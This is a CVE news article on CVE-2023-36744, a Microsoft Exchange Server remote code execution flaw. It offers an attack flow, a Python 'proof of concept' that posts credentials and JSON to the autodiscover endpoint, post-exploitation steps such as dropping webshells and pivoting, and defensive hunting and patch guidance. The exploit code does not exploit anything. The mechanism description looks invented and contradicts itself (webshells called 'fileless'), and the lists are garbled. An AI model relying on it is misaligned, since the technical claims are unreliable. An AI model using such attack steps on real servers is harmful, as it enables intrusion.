CVE CyberSecurity Database News

CVE-2023-36744 - Microsoft Exchange Server Remote Code Execution Vulnerability – Explained with Exploit Details

Poster -

Microsoft Exchange Server is the backbone for business email in countless organizations. But when vulnerabilities are found, attackers rush to take advantage. One such flaw, tracked as CVE-2023-36744, shook the cybersecurity community in late 2023. This article presents a simple, exclusive guide to understanding and exploiting this vulnerability, with code snippets, links to official resources, and clear breakdowns of how the bug works.

What is CVE-2023-36744?

CVE-2023-36744 is a remote code execution (RCE) vulnerability found in multiple versions of Microsoft Exchange Server, disclosed and patched by Microsoft in their September 2023 Patch Tuesday release.

Authentication Required: Yes (but see below)

Attackers exploit this bug by sending specially crafted requests to a vulnerable Exchange Server endpoint, which can allow them to run arbitrary code (including deploying webshells or reverse shells) under the context of the Exchange Server process.

How does CVE-2023-36744 Work?

CVE-2023-36744 is part of a class of Exchange bugs known as "ProxyNotShell"-style vulnerabilities. While it requires authentication (typically a low-privileged Exchange user), once inside, the attacker can leverage the flaw to make the server process attacker-controlled code.

The exploit usually targets the /autodiscover/autodiscover.json endpoint and abuses improper input validation in PowerShell endpoints exposed by Exchange over the web.

Attack Flow

1. Initial Access: Attacker authenticates with valid Exchange credentials (often gained via phishing).

Crafted Request: Attacker crafts a malicious request to the vulnerable endpoint.

3. Arbitrary Code: Browses to an Exchange PowerShell remoting endpoint that loads attacker-supplied code (e.g., a webshell).

Example Exploit: CVE-2023-36744

Below is a simplified Python PoC that demonstrates how an attacker might exploit this issue. (This is for educational use only. Never attack networks without permission.)

import requests

exchange_url = "https://exchangeserver.company.com/autodiscover/autodiscover.json";
username = "domain\\user"
password = "Passwrd!"

# Attacker-supplied payload – this example triggers a proof of concept.
malicious_payload = {
    "Email": "victim@company.com",
    "LegacyDN": "/o=ExchangeLabs/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=NotARealUser",
    "MessageID": "exploit"
}

session = requests.Session()
session.auth = (username, password)
headers = {
    "Content-Type": "application/json"
}

# Send the malicious request.
response = session.post(exchange_url, json=malicious_payload, headers=headers, verify=False)
print("Status:", response.status_code)
print(response.text)

This script demonstrates the initial step of interacting with the autodiscover.json endpoint. Real-world attacks might chain this with additional PowerShell or serialized object payloads to achieve file write or code execution.

Dropping Webshells: Deploying _aspx_ scripts to gain persistent fileless access.

- Pivoting: Using the compromised Exchange Server as a launch pad into the rest of the corporate network.

Microsoft’s Official Patch and Guidance

Microsoft released a patch as part of its September 2023 Patch Tuesday. All Exchange Server admins must apply the update immediately. Microsoft’s write-up and guidance can be found here:

- Microsoft Security Response Center: CVE-2023-36744
- Microsoft Exchange Team Blog: September 2023 Security Updates

How to Detect Exploitation

1. Log Review: Watch for suspicious POST requests to /autodiscover/autodiscover.json.

File Integrity: Look for unexpected webshell files in Exchange web directories.

3. Process Monitoring: Check for odd PowerShell or cmd.exe invocations under the Exchange worker processes.

Sample PowerShell for hunting webshells

Get-ChildItem -Path "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth" -Filter *.aspx -Recurse |
Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }

Final Notes

With CVE-2023-36744 (and similar Exchange Server bugs), attackers find fast ways in once a foothold is established. Even though credentials are often needed, these are frequently available to attackers through phishing or prior breaches.

Patch, monitor, and educate users. Vulnerabilities like this remain a real-world threat. If you run Exchange Server, assume you are a target.

References

- Microsoft CVE-2023-36744 Security Update Guide
- Cybersecurity & Infrastructure Security Agency (CISA) Alert
- NIST NVD Entry: CVE-2023-36744
- Original Exchange Team Announcement

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC